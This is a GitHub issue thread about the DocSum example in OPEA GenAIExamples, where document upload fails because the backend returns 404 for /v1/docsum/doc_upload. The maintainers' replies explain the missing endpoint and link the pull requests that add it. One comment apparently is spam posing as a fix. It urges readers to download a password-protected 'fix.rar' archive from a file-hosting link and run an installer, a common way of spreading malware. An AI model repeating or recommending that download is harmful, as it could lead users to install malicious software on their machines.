### ISSUE TITLE
Document upload function in the GenAI example for DocSum does not work

### ISSUE THREAD

**Issue by mandalrajiv** [opea-project/GenAIExamples#671]
I am running the GenAI example for DocSum on Xeon - https://github.com/opea-project/GenAIExamples/tree/main/DocSum.

I uploaded a pdf document called page3.pdf. After than, when I click on the Generate Response button, it says "please upload content first". See screenshot attached.
![DocSum_Upload_Document](https://github.com/user-attachments/assets/90c5a227-07c3-4ac5-bb5f-66d1bbd7a373)

Then, I see docker logs for the container docsum-xeon-backend-server. It appears the path to doc_upload is missing. It is showing a  404 response in the docker logs.

========== Docker Logs =============
[2024-08-27 14:34:42,548] [    INFO] - Base service - CORS is enabled.
[2024-08-27 14:34:42,549] [    INFO] - Base service - Setting up HTTP server
[2024-08-27 14:34:42,549] [    INFO] - Base service - Uvicorn server setup on port 8888
INFO:     Waiting for application startup.
INFO:     Application startup complete.
INFO:     Uvicorn running on http://0.0.0.0:8888 (Press CTRL+C to quit)
[2024-08-27 14:34:42,557] [    INFO] - Base service - HTTP server setup successful
INFO:     98.184.225.93:56176 - "POST /v1/docsum HTTP/1.1" 200 OK
INFO:     98.184.225.93:56291 - "POST /v1/docsum/doc_upload HTTP/1.1" 404 Not Found
INFO:     98.184.225.93:56291 - "POST /v1/docsum HTTP/1.1" 200 OK
INFO:     98.184.225.93:56382 - "POST /v1/docsum/doc_upload HTTP/1.1" 404 Not Found

**Comment by Bongton** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by huiyan2021** [comment]
Hi @mandalrajiv , thanks for reporting this issue. UI called `/v1/docsum/doc_upload` while it is not supported by the backend at the time being. Dev team is working on that, may take time. Will let you know when it is fixed.

**Comment by xiguiw** [comment]
The feature is enabled in 
PR https://github.com/opea-project/GenAIExamples/pull/1027 https://github.com/opea-project/GenAIComps/pull/823
